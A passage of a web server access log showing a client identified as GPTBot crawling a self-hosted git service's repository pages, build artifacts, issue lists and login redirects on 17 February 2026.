+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11160] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9840] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:44:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9842] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9831] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9839] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9842] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:44:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 